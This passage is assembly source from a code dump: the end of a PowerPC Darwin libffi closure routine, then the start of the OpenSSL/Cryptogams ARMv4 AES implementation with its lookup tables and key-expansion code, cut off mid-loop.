/* 176/256 bytes (callee stack frame aligned to 16/32)
24/48 bytes (caller linkage area)
200/304 (start of caller parameter area aligned to 4/8)
*/
/* Save GPRs 3 - 10 (aligned to 4/8)
in the parents outgoing area. */
stg r3,200(r1)
stg r4,204(r1)
stg r5,208(r1)
stg r6,212(r1)
stg r7,216(r1)
stg r8,220(r1)
stg r9,224(r1)
stg r10,228(r1)
/* Save FPRs 1 - 13. (aligned to 8) */
stfd f1,56(r1)
stfd f2,64(r1)
stfd f3,72(r1)
stfd f4,80(r1)
stfd f5,88(r1)
stfd f6,96(r1)
stfd f7,104(r1)
stfd f8,112(r1)
stfd f9,120(r1)
stfd f10,128(r1)
stfd f11,136(r1)
stfd f12,144(r1)
stfd f13,152(r1)
// Set up registers for the routine that actually does the work.
mr r3,r11 // context pointer from the trampoline
addi r4,r1,160 // result storage
addi r5,r1,200 // saved GPRs
addi r6,r1,56 // saved FPRs
bl Lffi_closure_helper_DARWIN$stub
/* Now r3 contains the return type. Use it to look up in a table
so we know how to deal with each type. */
addi r5,r1,160 // Copy result storage pointer.
bl Lget_ret_type0_addr // Get pointer to Lret_type0 into LR.
mflr r4 // Move to r4.
slwi r3,r3,4 // Multiply return type by 16.
add r3,r3,r4 // Add contents of table to table address.
mtctr r3
bctr
LFE1:
/* Each of the ret_typeX code fragments has to be exactly 16 bytes long
(4 instructions). For cache effectiveness we align to a 16 byte boundary
first. */
.align 4
nop
nop
nop
Lget_ret_type0_addr:
blrl
/* case FFI_TYPE_VOID */
Lret_type0:
b Lfinish
nop
nop
nop
/* case FFI_TYPE_INT */
Lret_type1:
lwz r3,0(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_FLOAT */
Lret_type2:
lfs f1,0(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_DOUBLE */
Lret_type3:
lfd f1,0(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_LONGDOUBLE */
Lret_type4:
lfd f1,0(r5)
lfd f2,8(r5)
b Lfinish
nop
/* case FFI_TYPE_UINT8 */
Lret_type5:
lbz r3,3(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_SINT8 */
Lret_type6:
lbz r3,3(r5)
extsb r3,r3
b Lfinish
nop
/* case FFI_TYPE_UINT16 */
Lret_type7:
lhz r3,2(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_SINT16 */
Lret_type8:
lha r3,2(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_UINT32 */
Lret_type9: // same as Lret_type1
lwz r3,0(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_SINT32 */
Lret_type10: // same as Lret_type1
lwz r3,0(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_UINT64 */
Lret_type11:
lwz r3,0(r5)
lwz r4,4(r5)
b Lfinish
nop
/* case FFI_TYPE_SINT64 */
Lret_type12: // same as Lret_type11
lwz r3,0(r5)
lwz r4,4(r5)
b Lfinish
nop
/* case FFI_TYPE_STRUCT */
Lret_type13:
b Lfinish
nop
nop
nop
/* End 16-byte aligned cases */
/* case FFI_TYPE_POINTER */
// This case assumes that FFI_TYPE_POINTER == FFI_TYPE_LAST. If more types
// are added in future, the following code will need to be updated and
// padded to 16 bytes.
Lret_type14:
lg r3,0(r5)
// fall through
/* case done */
Lfinish:
addi r1,r1,SF_ROUND(176) // Restore stack pointer.
lg r0,SF_RETURN(r1) // Restore return address.
mtlr r0 // Restore link register.
blr
/* END(ffi_closure_ASM) */
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms+live_support
EH_frame1:
.set L$set$0,LECIE1-LSCIE1
.long L$set$0 ; Length of Common Information Entry
LSCIE1:
.long 0x0 ; CIE Identifier Tag
.byte 0x1 ; CIE Version
.ascii "zR\0" ; CIE Augmentation
.byte 0x1 ; uleb128 0x1; CIE Code Alignment Factor
.byte 0x7c ; sleb128 -4; CIE Data Alignment Factor
.byte 0x41 ; CIE RA Column
.byte 0x1 ; uleb128 0x1; Augmentation size
.byte 0x10 ; FDE Encoding (pcrel)
.byte 0xc ; DW_CFA_def_cfa
.byte 0x1 ; uleb128 0x1
.byte 0x0 ; uleb128 0x0
.align LOG2_GPR_BYTES
LECIE1:
.globl _ffi_closure_ASM.eh
_ffi_closure_ASM.eh:
LSFDE1:
.set L$set$1,LEFDE1-LASFDE1
.long L$set$1 ; FDE Length
LASFDE1:
.long LASFDE1-EH_frame1 ; FDE CIE offset
.g_long LFB1-. ; FDE initial location
.set L$set$3,LFE1-LFB1
.g_long L$set$3 ; FDE address range
.byte 0x0 ; uleb128 0x0; Augmentation size
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$3,LCFI1-LCFI0
.long L$set$3
.byte 0xe ; DW_CFA_def_cfa_offset
.byte 176,1 ; uleb128 176
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$4,LCFI0-LFB1
.long L$set$4
.byte 0x11 ; DW_CFA_offset_extended_sf
.byte 0x41 ; uleb128 0x41
.byte 0x7e ; sleb128 -2
.align LOG2_GPR_BYTES
LEFDE1:
.data
.align LOG2_GPR_BYTES
LDFCM0:
.section __TEXT,__picsymbolstub1,symbol_stubs,pure_instructions,32
.align LOG2_GPR_BYTES
Lffi_closure_helper_DARWIN$stub:
.indirect_symbol _ffi_closure_helper_DARWIN
mflr r0
bcl 20,31,LO$ffi_closure_helper_DARWIN
LO$ffi_closure_helper_DARWIN:
mflr r11
addis r11,r11,ha16(L_ffi_closure_helper_DARWIN$lazy_ptr - LO$ffi_closure_helper_DARWIN)
mtlr r0
lgu r12,lo16(L_ffi_closure_helper_DARWIN$lazy_ptr - LO$ffi_closure_helper_DARWIN)(r11)
mtctr r12
bctr
.lazy_symbol_pointer
L_ffi_closure_helper_DARWIN$lazy_ptr:
.indirect_symbol _ffi_closure_helper_DARWIN
.g_long dyld_stub_binding_helper
#endif // __ppc__
|
Akhil-Sharma-26/yeet
| 32,114
|
external/cryptopp/aes_armv4.S
|
@ Copyright 2007-2018 The OpenSSL Project Authors. All Rights Reserved.
@
@ ====================================================================
@ Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
@ project. The module is, however, dual licensed under OpenSSL and
@ CRYPTOGAMS licenses depending on where you obtain it. For further
@ details see http://www.openssl.org/~appro/cryptogams/.
@ ====================================================================
@ JW, JUL 2018: Begin defines from taken from arm_arch.h
@ The defines were included through the header.
# if !defined(__ARM_ARCH__)
# if defined(__CC_ARM)
# define __ARM_ARCH__ __TARGET_ARCH_ARM
# if defined(__BIG_ENDIAN)
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__GNUC__)
# if defined(__aarch64__)
# define __ARM_ARCH__ 8
# if __BYTE_ORDER__==__ORDER_BIG_ENDIAN__
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__ARM_ARCH)
# define __ARM_ARCH__ __ARM_ARCH
# elif defined(__ARM_ARCH_8A__)
# define __ARM_ARCH__ 8
# elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || \
defined(__ARM_ARCH_7R__)|| defined(__ARM_ARCH_7M__) || \
defined(__ARM_ARCH_7EM__)
# define __ARM_ARCH__ 7
# elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || \
defined(__ARM_ARCH_6K__)|| defined(__ARM_ARCH_6M__) || \
defined(__ARM_ARCH_6Z__)|| defined(__ARM_ARCH_6ZK__) || \
defined(__ARM_ARCH_6T2__)
# define __ARM_ARCH__ 6
# elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__) || \
defined(__ARM_ARCH_5E__)|| defined(__ARM_ARCH_5TE__) || \
defined(__ARM_ARCH_5TEJ__)
# define __ARM_ARCH__ 5
# elif defined(__ARM_ARCH_4__) || defined(__ARM_ARCH_4T__)
# define __ARM_ARCH__ 4
# else
# error "unsupported ARM architecture"
# endif
# endif
# endif
# if !defined(__ARM_MAX_ARCH__)
# define __ARM_MAX_ARCH__ __ARM_ARCH__
# endif
# if __ARM_MAX_ARCH__<__ARM_ARCH__
# error "__ARM_MAX_ARCH__ can't be less than __ARM_ARCH__"
# elif __ARM_MAX_ARCH__!=__ARM_ARCH__
# if __ARM_ARCH__<7 && __ARM_MAX_ARCH__>=7 && defined(__ARMEB__)
# error "can't build universal big-endian binary"
# endif
# endif
@ JW, JUL 2018: End defines from taken from arm_arch.h
@ Back to original Cryptogams code
#if defined(__thumb2__) && !defined(__APPLE__)
.syntax unified
.thumb
#else
.code 32
#undef __thumb2__
#endif
.text
.type AES_Te,%object
.align 5
AES_Te:
.word 0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d
.word 0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554
.word 0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d
.word 0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a
.word 0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87
.word 0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b
.word 0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea
.word 0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b
.word 0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a
.word 0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f
.word 0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108
.word 0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f
.word 0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e
.word 0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5
.word 0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d
.word 0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f
.word 0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e
.word 0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb
.word 0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce
.word 0x5229297b, 0xdde3e33e, 0x5e2f2f71, 0x13848497
.word 0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c
.word 0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed
.word 0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b
.word 0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a
.word 0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16
.word 0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594
.word 0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81
.word 0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3
.word 0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a
.word 0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504
.word 0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163
.word 0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d
.word 0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f
.word 0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739
.word 0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47
.word 0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395
.word 0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f
.word 0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883
.word 0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c
.word 0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76
.word 0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e
.word 0x924949db, 0x0c06060a, 0x4824246c, 0xb85c5ce4
.word 0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6
.word 0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b
.word 0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7
.word 0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0
.word 0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25
.word 0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818
.word 0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72
.word 0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651
.word 0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21
.word 0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85
.word 0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa
.word 0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12
.word 0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0
.word 0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9
.word 0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133
.word 0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7
.word 0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920
.word 0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a
.word 0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17
.word 0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8
.word 0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11
.word 0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a
@ Te4[256]
.byte 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5
.byte 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76
.byte 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0
.byte 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0
.byte 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc
.byte 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15
.byte 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a
.byte 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75
.byte 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0
.byte 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84
.byte 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b
.byte 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf
.byte 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85
.byte 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8
.byte 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5
.byte 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2
.byte 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17
.byte 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73
.byte 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88
.byte 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb
.byte 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c
.byte 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79
.byte 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9
.byte 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08
.byte 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6
.byte 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a
.byte 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e
.byte 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e
.byte 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94
.byte 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf
.byte 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68
.byte 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
@ rcon[]
.word 0x01000000, 0x02000000, 0x04000000, 0x08000000
.word 0x10000000, 0x20000000, 0x40000000, 0x80000000
.word 0x1B000000, 0x36000000, 0, 0, 0, 0, 0, 0
.size AES_Te,.-AES_Te
@ void cryptogams_AES_encrypt_block(const unsigned char *in, unsigned char *out,
@ const AES_KEY *key) {
.globl cryptogams_AES_encrypt_block
.type cryptogams_AES_encrypt_block,%function
.align 5
cryptogams_AES_encrypt_block:
#ifndef __thumb2__
sub r3,pc,#8 @ cryptogams_AES_encrypt_block
#else
adr r3,.
#endif
stmdb sp!,{r1,r4-r12,lr}
#if defined(__thumb2__) || defined(__APPLE__)
adr r10,AES_Te
#else
sub r10,r3,#cryptogams_AES_encrypt_block-AES_Te @ Te
#endif
mov r12,r0 @ inp
mov r11,r2
#if __ARM_ARCH__<7
ldrb r0,[r12,#3] @ load input data in endian-neutral
ldrb r4,[r12,#2] @ manner...
ldrb r5,[r12,#1]
ldrb r6,[r12,#0]
orr r0,r0,r4,lsl#8
ldrb r1,[r12,#7]
orr r0,r0,r5,lsl#16
ldrb r4,[r12,#6]
orr r0,r0,r6,lsl#24
ldrb r5,[r12,#5]
ldrb r6,[r12,#4]
orr r1,r1,r4,lsl#8
ldrb r2,[r12,#11]
orr r1,r1,r5,lsl#16
ldrb r4,[r12,#10]
orr r1,r1,r6,lsl#24
ldrb r5,[r12,#9]
ldrb r6,[r12,#8]
orr r2,r2,r4,lsl#8
ldrb r3,[r12,#15]
orr r2,r2,r5,lsl#16
ldrb r4,[r12,#14]
orr r2,r2,r6,lsl#24
ldrb r5,[r12,#13]
ldrb r6,[r12,#12]
orr r3,r3,r4,lsl#8
orr r3,r3,r5,lsl#16
orr r3,r3,r6,lsl#24
#else
ldr r0,[r12,#0]
ldr r1,[r12,#4]
ldr r2,[r12,#8]
ldr r3,[r12,#12]
#ifdef __ARMEL__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
#endif
#endif
bl _cryptogams_armv4_AES_encrypt_block
ldr r12,[sp],#4 @ pop out
#if __ARM_ARCH__>=7
#ifdef __ARMEL__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
#endif
str r0,[r12,#0]
str r1,[r12,#4]
str r2,[r12,#8]
str r3,[r12,#12]
#else
mov r4,r0,lsr#24 @ write output in endian-neutral
mov r5,r0,lsr#16 @ manner...
mov r6,r0,lsr#8
strb r4,[r12,#0]
strb r5,[r12,#1]
mov r4,r1,lsr#24
strb r6,[r12,#2]
mov r5,r1,lsr#16
strb r0,[r12,#3]
mov r6,r1,lsr#8
strb r4,[r12,#4]
strb r5,[r12,#5]
mov r4,r2,lsr#24
strb r6,[r12,#6]
mov r5,r2,lsr#16
strb r1,[r12,#7]
mov r6,r2,lsr#8
strb r4,[r12,#8]
strb r5,[r12,#9]
mov r4,r3,lsr#24
strb r6,[r12,#10]
mov r5,r3,lsr#16
strb r2,[r12,#11]
mov r6,r3,lsr#8
strb r4,[r12,#12]
strb r5,[r12,#13]
strb r6,[r12,#14]
strb r3,[r12,#15]
#endif
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_AES_encrypt_block,.-cryptogams_AES_encrypt_block
.type _cryptogams_armv4_AES_encrypt_block,%function
.align 2
_cryptogams_armv4_AES_encrypt_block:
str lr,[sp,#-4]! @ push lr
ldmia r11!,{r4,r5,r6,r7}
eor r0,r0,r4
ldr r12,[r11,#240-16]
eor r1,r1,r5
eor r2,r2,r6
eor r3,r3,r7
sub r12,r12,#1
mov lr,#255
and r7,lr,r0
and r8,lr,r0,lsr#8
and r9,lr,r0,lsr#16
mov r0,r0,lsr#24
.Lenc_loop:
ldr r4,[r10,r7,lsl#2] @ Te3[s0>>0]
and r7,lr,r1,lsr#16 @ i0
ldr r5,[r10,r8,lsl#2] @ Te2[s0>>8]
and r8,lr,r1
ldr r6,[r10,r9,lsl#2] @ Te1[s0>>16]
and r9,lr,r1,lsr#8
ldr r0,[r10,r0,lsl#2] @ Te0[s0>>24]
mov r1,r1,lsr#24
ldr r7,[r10,r7,lsl#2] @ Te1[s1>>16]
ldr r8,[r10,r8,lsl#2] @ Te3[s1>>0]
ldr r9,[r10,r9,lsl#2] @ Te2[s1>>8]
eor r0,r0,r7,ror#8
ldr r1,[r10,r1,lsl#2] @ Te0[s1>>24]
and r7,lr,r2,lsr#8 @ i0
eor r5,r5,r8,ror#8
and r8,lr,r2,lsr#16 @ i1
eor r6,r6,r9,ror#8
and r9,lr,r2
ldr r7,[r10,r7,lsl#2] @ Te2[s2>>8]
eor r1,r1,r4,ror#24
ldr r8,[r10,r8,lsl#2] @ Te1[s2>>16]
mov r2,r2,lsr#24
ldr r9,[r10,r9,lsl#2] @ Te3[s2>>0]
eor r0,r0,r7,ror#16
ldr r2,[r10,r2,lsl#2] @ Te0[s2>>24]
and r7,lr,r3 @ i0
eor r1,r1,r8,ror#8
and r8,lr,r3,lsr#8 @ i1
eor r6,r6,r9,ror#16
and r9,lr,r3,lsr#16 @ i2
ldr r7,[r10,r7,lsl#2] @ Te3[s3>>0]
eor r2,r2,r5,ror#16
ldr r8,[r10,r8,lsl#2] @ Te2[s3>>8]
mov r3,r3,lsr#24
ldr r9,[r10,r9,lsl#2] @ Te1[s3>>16]
eor r0,r0,r7,ror#24
ldr r7,[r11],#16
eor r1,r1,r8,ror#16
ldr r3,[r10,r3,lsl#2] @ Te0[s3>>24]
eor r2,r2,r9,ror#8
ldr r4,[r11,#-12]
eor r3,r3,r6,ror#8
ldr r5,[r11,#-8]
eor r0,r0,r7
ldr r6,[r11,#-4]
and r7,lr,r0
eor r1,r1,r4
and r8,lr,r0,lsr#8
eor r2,r2,r5
and r9,lr,r0,lsr#16
eor r3,r3,r6
mov r0,r0,lsr#24
subs r12,r12,#1
bne .Lenc_loop
add r10,r10,#2
ldrb r4,[r10,r7,lsl#2] @ Te4[s0>>0]
and r7,lr,r1,lsr#16 @ i0
ldrb r5,[r10,r8,lsl#2] @ Te4[s0>>8]
and r8,lr,r1
ldrb r6,[r10,r9,lsl#2] @ Te4[s0>>16]
and r9,lr,r1,lsr#8
ldrb r0,[r10,r0,lsl#2] @ Te4[s0>>24]
mov r1,r1,lsr#24
ldrb r7,[r10,r7,lsl#2] @ Te4[s1>>16]
ldrb r8,[r10,r8,lsl#2] @ Te4[s1>>0]
ldrb r9,[r10,r9,lsl#2] @ Te4[s1>>8]
eor r0,r7,r0,lsl#8
ldrb r1,[r10,r1,lsl#2] @ Te4[s1>>24]
and r7,lr,r2,lsr#8 @ i0
eor r5,r8,r5,lsl#8
and r8,lr,r2,lsr#16 @ i1
eor r6,r9,r6,lsl#8
and r9,lr,r2
ldrb r7,[r10,r7,lsl#2] @ Te4[s2>>8]
eor r1,r4,r1,lsl#24
ldrb r8,[r10,r8,lsl#2] @ Te4[s2>>16]
mov r2,r2,lsr#24
ldrb r9,[r10,r9,lsl#2] @ Te4[s2>>0]
eor r0,r7,r0,lsl#8
ldrb r2,[r10,r2,lsl#2] @ Te4[s2>>24]
and r7,lr,r3 @ i0
eor r1,r1,r8,lsl#16
and r8,lr,r3,lsr#8 @ i1
eor r6,r9,r6,lsl#8
and r9,lr,r3,lsr#16 @ i2
ldrb r7,[r10,r7,lsl#2] @ Te4[s3>>0]
eor r2,r5,r2,lsl#24
ldrb r8,[r10,r8,lsl#2] @ Te4[s3>>8]
mov r3,r3,lsr#24
ldrb r9,[r10,r9,lsl#2] @ Te4[s3>>16]
eor r0,r7,r0,lsl#8
ldr r7,[r11,#0]
ldrb r3,[r10,r3,lsl#2] @ Te4[s3>>24]
eor r1,r1,r8,lsl#8
ldr r4,[r11,#4]
eor r2,r2,r9,lsl#16
ldr r5,[r11,#8]
eor r3,r6,r3,lsl#24
ldr r6,[r11,#12]
eor r0,r0,r7
eor r1,r1,r4
eor r2,r2,r5
eor r3,r3,r6
sub r10,r10,#2
ldr pc,[sp],#4 @ pop and return
.size _cryptogams_armv4_AES_encrypt_block,.-_cryptogams_armv4_AES_encrypt_block
.globl cryptogams_AES_set_encrypt_key
.type cryptogams_AES_set_encrypt_key,%function
.align 5
cryptogams_AES_set_encrypt_key:
_armv4_AES_set_encrypt_key:
#ifndef __thumb2__
sub r3,pc,#8 @ AES_set_encrypt_key
#else
adr r3,.
#endif
teq r0,#0
#ifdef __thumb2__
itt eq @ Thumb2 thing, sanity check in ARM
#endif
moveq r0,#-1
beq .Labrt
teq r2,#0
#ifdef __thumb2__
itt eq @ Thumb2 thing, sanity check in ARM
#endif
moveq r0,#-1
beq .Labrt
teq r1,#128
beq .Lok
teq r1,#192
beq .Lok
teq r1,#256
#ifdef __thumb2__
itt ne @ Thumb2 thing, sanity check in ARM
#endif
movne r0,#-1
bne .Labrt
.Lok: stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
mov r12,r0 @ inp
mov lr,r1 @ bits
mov r11,r2 @ key
#if defined(__thumb2__) || defined(__APPLE__)
adr r10,AES_Te+1024 @ Te4
#else
sub r10,r3,#_armv4_AES_set_encrypt_key-AES_Te-1024 @ Te4
#endif
#if __ARM_ARCH__<7
ldrb r0,[r12,#3] @ load input data in endian-neutral
ldrb r4,[r12,#2] @ manner...
ldrb r5,[r12,#1]
ldrb r6,[r12,#0]
orr r0,r0,r4,lsl#8
ldrb r1,[r12,#7]
orr r0,r0,r5,lsl#16
ldrb r4,[r12,#6]
orr r0,r0,r6,lsl#24
ldrb r5,[r12,#5]
ldrb r6,[r12,#4]
orr r1,r1,r4,lsl#8
ldrb r2,[r12,#11]
orr r1,r1,r5,lsl#16
ldrb r4,[r12,#10]
orr r1,r1,r6,lsl#24
ldrb r5,[r12,#9]
ldrb r6,[r12,#8]
orr r2,r2,r4,lsl#8
ldrb r3,[r12,#15]
orr r2,r2,r5,lsl#16
ldrb r4,[r12,#14]
orr r2,r2,r6,lsl#24
ldrb r5,[r12,#13]
ldrb r6,[r12,#12]
orr r3,r3,r4,lsl#8
str r0,[r11],#16
orr r3,r3,r5,lsl#16
str r1,[r11,#-12]
orr r3,r3,r6,lsl#24
str r2,[r11,#-8]
str r3,[r11,#-4]
#else
ldr r0,[r12,#0]
ldr r1,[r12,#4]
ldr r2,[r12,#8]
ldr r3,[r12,#12]
#ifdef __ARMEL__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
#endif
str r0,[r11],#16
str r1,[r11,#-12]
str r2,[r11,#-8]
str r3,[r11,#-4]
#endif
teq lr,#128
bne .Lnot128
mov r12,#10
str r12,[r11,#240-16]
add r6,r10,#256 @ rcon
mov lr,#255
.L128_loop:
and r5,lr,r3,lsr#24
and r7,lr,r3,lsr#16
ldrb r5,[r10,r5]
and r8,lr,r3,lsr#8
ldrb r7,[r10,r7]
and r9,lr,r3
ldrb r8,[r10,r8]
orr r5,r5,r7,lsl#24
ldrb r9,[r10,r9]
orr r5,r5,r8,lsl#16
ldr r4,[r6],#4 @ rcon[i++]
orr r5,r5,r9,lsl#8
eor r5,r5,r4
eor r0,r0,r5 @ rk[4]=rk[0]^...
eor r1,r1,r0 @ rk[5]=rk[1]^rk[4]
str r0,[r11],#16
eor r2,r2,r1 @ rk[6]=rk[2]^rk[5]
str r1,[r11,#-12]
eor r3,r3,r2 @ rk[7]=rk[3]^rk[6]
str r2,[r11,#-8]
subs r12,r12,#1
str r3,[r11,#-4]
bne .L128_loop
sub r2,r11,#176
b .Ldone
.Lnot128:
#if __ARM_ARCH__<7
ldrb r8,[r12,#19]
ldrb r4,[r12,#18]
ldrb r5,[r12,#17]
ldrb r6,[r12,#16]
orr r8,r8,r4,lsl#8
ldrb r9,[r12,#23]
orr r8,r8,r5,lsl#16
ldrb r4,[r12,#22]
orr r8,r8,r6,lsl#24
ldrb r5,[r12,#21]
ldrb r6,[r12,#20]
orr r9,r9,r4,lsl#8
orr r9,r9,r5,lsl#16
str r8,[r11],#8
orr r9,r9,r6,lsl#24
str r9,[r11,#-4]
#else
ldr r8,[r12,#16]
ldr r9,[r12,#20]
#ifdef __ARMEL__
rev r8,r8
rev r9,r9
#endif
str r8,[r11],#8
str r9,[r11,#-4]
#endif
teq lr,#192
bne .Lnot192
mov r12,#12
str r12,[r11,#240-24]
add r6,r10,#256 @ rcon
mov lr,#255
mov r12,#8
.L192_loop:
and r5,lr,r9,lsr#24
and r7,lr,r9,lsr#16
ldrb r5,[r10,r5]
and r8,lr,r9,lsr#8
ldrb r7,[r10,r7]
and r9,lr,r9
ldrb r8,[r10,r8]
orr r5,r5,r7,lsl#24
ldrb r9,[r10,r9]
orr r5,r5,r8,lsl#16
ldr r4,[r6],#4 @ rcon[i++]
orr r5,r5,r9,lsl#8
eor r9,r5,r4
eor r0,r0,r9 @ rk[6]=rk[0]^...
eor r1,r1,r0 @ rk[7]=rk[1]^rk[6]
